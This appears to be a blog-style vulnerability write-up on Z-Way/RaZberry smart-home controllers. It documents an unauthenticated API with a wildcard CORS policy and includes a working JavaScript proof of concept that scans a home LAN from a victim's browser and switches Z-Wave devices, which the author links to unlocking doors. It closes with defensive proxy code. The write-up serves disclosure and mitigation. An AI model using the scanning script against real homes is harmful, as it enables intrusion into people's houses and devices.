How to hack a smart home under Z-Way control
Z-Wave is a new smart home technology that uses the Z-Way communication protocol. This wireless networking specification is already mature in Europe and America. I recently bought a RaZberry board and started researching smart home devices.
What is Z-Way
I chose the RaZberry board instead of a traditional Z-Wave controller mainly because it is compatible with the Raspberry Pi: it lets me reach the Z-Wave protocol and the general-purpose input/output (GPIO) devices programmatically, which is very helpful for studying the alarm sensors in my house. By the way, Z-Way wraps the features of Z-Wave in a REST (Representational State Transfer) API, which makes it easier to use. The Z-Way project even ships a basic web interface, including a gateway management interface.
Test process
After installing the software for the RaZberry board and pairing some devices, I began to observe the web requests generated when the devices are controlled. Z-Way uses the AngularJS framework to expose an API for access from the web and Android apps.
The following is the request that turns on a light:
POST http://192.168.5.219:8083/ZWaveAPI/Run/devices[12].instances[0].commandClasses[37].Set(255) HTTP/1.1
Host: 192.168.5.219:8083
Connection: keep-alive
Content-Length: 0
Accept: application/json, text/plain, */*
Origin: http://192.168.5.219:8083
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Referer: http://192.168.5.219:8083/expert/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
The following is the response:
HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Content-Length: 4

null
At this point I found a serious problem: the Angular APIs do not require any authentication. Searching the official website, I found that a user had raised exactly this question in the FAQ:
Q: Are the HTTP/JSON APIs protected by HTTP authentication? A: Of course not. The manufacturer assumes your intranet is absolutely secure: it is protected by a third-party firewall and a password, with no external intrusion. If you want to protect Z-Way with a password, you can use nginx or another reverse proxy server and configure it there.
It seems the vendor already knows about this problem but has not solved it itself. In the past most users of this kind of hardware were technical geeks, with only a minority of ordinary users. I still feel there is a potential crisis, because it leaves users exposed to a risk they do not know about. A user's LAN may be relatively secure, but that does not mean remote attacks are impossible. I began to think about how the API could be attacked from outside the LAN, and then I remembered the response packet above. Note: the default CORS (Cross-Origin Resource Sharing) header of the Z-Way web server allows any origin. It responds with Access-Control-Allow-Origin: *, that is, every origin is allowed, which obviously opens the door to cross-origin attacks.
The following PoC shows how malicious JavaScript could scan intranet hosts and perform Z-Wave operations. Because the requests are asynchronous, the victim does not notice what is happening.
jQuery(document).ready(function() {
  for (var i = 1; i <= 254; i++) {
    var host = "192.168.5." + i;
    var url = "http://" + host + ":8083/ZWaveAPI/Run/devices[99].instances[0].commandClasses[37].Set(255)";
    $.ajax({ type: "POST", url: url, host: host })
      .always(function(r) {
        if (r.status != 0) {
          var valid_host = this.host;
          // Server found, enumerate devices
          for (var y = 0; y <= 15; y++) {
            $.post("http://" + valid_host + ":8083/ZWaveAPI/Run/devices[" + y + "].instances[0].commandClasses[37].Set(255)");
          }
        }
      });
  }
});
First, the script loops over the LAN hosts and sends a POST request to the API on each one. A host whose response status is not 0 is taken to be alive. Assuming the victim's controller has fewer than 99 devices, the probe itself does nothing; the script then walks device IDs up to 15 and tries to turn on the light. The real impact of this vulnerability lies in unlocking doors, opening garages, and other sensitive devices.
The following test simulates a host being attacked; a response code of 200 means success:
Attackers could also probe other common intranet ranges. If the victim's browser supports WebRTC, an attacker can learn more: a STUN request reveals the victim's intranet IP address, which narrows down the range to scan.
Adding authentication is not easy for the vendor to retrofit into RaZberry, but it is not difficult for users to achieve through other settings. Another improvement the vendor could make is to specify the allowed origins in the CORS policy rather than accepting every visitor. This vulnerability in Z-Way's request handling is very interesting: it reveals the risk of a permissive CORS implementation and shows how such implementations can be attacked.
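As a defensive counterpart to the above, here is an added example (not Z-Way's or the vendor's code) of the checks a reverse proxy placed in front of the Z-Way API could apply: parse a raw request like the one captured earlier, require HTTP Basic credentials on /ZWaveAPI/ paths, and answer cross-origin requests only from an explicit allowlist instead of `*`. The credentials, the allowlist and the attacker origin in the sample request are constructed.

```javascript
// Added example, not Z-Way's own code; credentials, allowlist and sample request are constructed.

// Split the header block of a raw HTTP/1.1 request into method, target and headers.
function parseRequest(raw) {
  const lines = raw.trim().split(/\r?\n/);
  const [method, target] = lines[0].split(" ");
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method, target, headers };
}

// Policy observed in the post: every origin is answered with "*". Kept only for comparison.
function wildcardPolicy(req) { return { forward: true, acao: "*" }; }

// Hardened policy: API paths require HTTP Basic credentials, and a cross-origin
// request is forwarded only when its Origin is on an explicit allowlist.
function strictPolicy(req, allowedOrigins, users) {
  if (!req.target.startsWith("/ZWaveAPI/")) return { forward: true, acao: null };
  const auth = req.headers["authorization"] || "";
  if (!auth.startsWith("Basic ")) return { forward: false, reason: "missing credentials" };
  const [user, pass] = Buffer.from(auth.slice(6), "base64").toString().split(":");
  if (!Object.prototype.hasOwnProperty.call(users, user) || users[user] !== pass) {
    return { forward: false, reason: "bad credentials" };
  }
  const origin = req.headers["origin"];
  // The local UI sends an Origin equal to its own host; no CORS header is needed then.
  if (origin === undefined || origin === "http://" + req.headers["host"]) {
    return { forward: true, acao: null };
  }
  if (allowedOrigins.includes(origin)) return { forward: true, acao: origin };
  return { forward: false, reason: "cross-origin request from " + origin };
}

// Constructed sample: the light-switch request from the post as a page at
// http://attacker.example would send it (valid credentials attached to show
// that the origin check alone is enough to stop it).
const SAMPLE = [
  "POST /ZWaveAPI/Run/devices[12].instances[0].commandClasses[37].Set(255) HTTP/1.1",
  "Host: 192.168.5.219:8083",
  "Origin: http://attacker.example",
  "Authorization: Basic " + Buffer.from("homeowner:hunter2").toString("base64"),
  "Content-Length: 0",
].join("\r\n");
const USERS = { homeowner: "hunter2" };                                           // constructed credential store
const ALLOWED = ["http://192.168.5.219:8083", "http://automation.home.example"];  // constructed origin allowlist
```

Run with Node: `strictPolicy(parseRequest(SAMPLE), ALLOWED, USERS)` refuses the request because of its origin even though the credentials are valid, while `wildcardPolicy` would have answered it with `Access-Control-Allow-Origin: *` exactly as the captured response did.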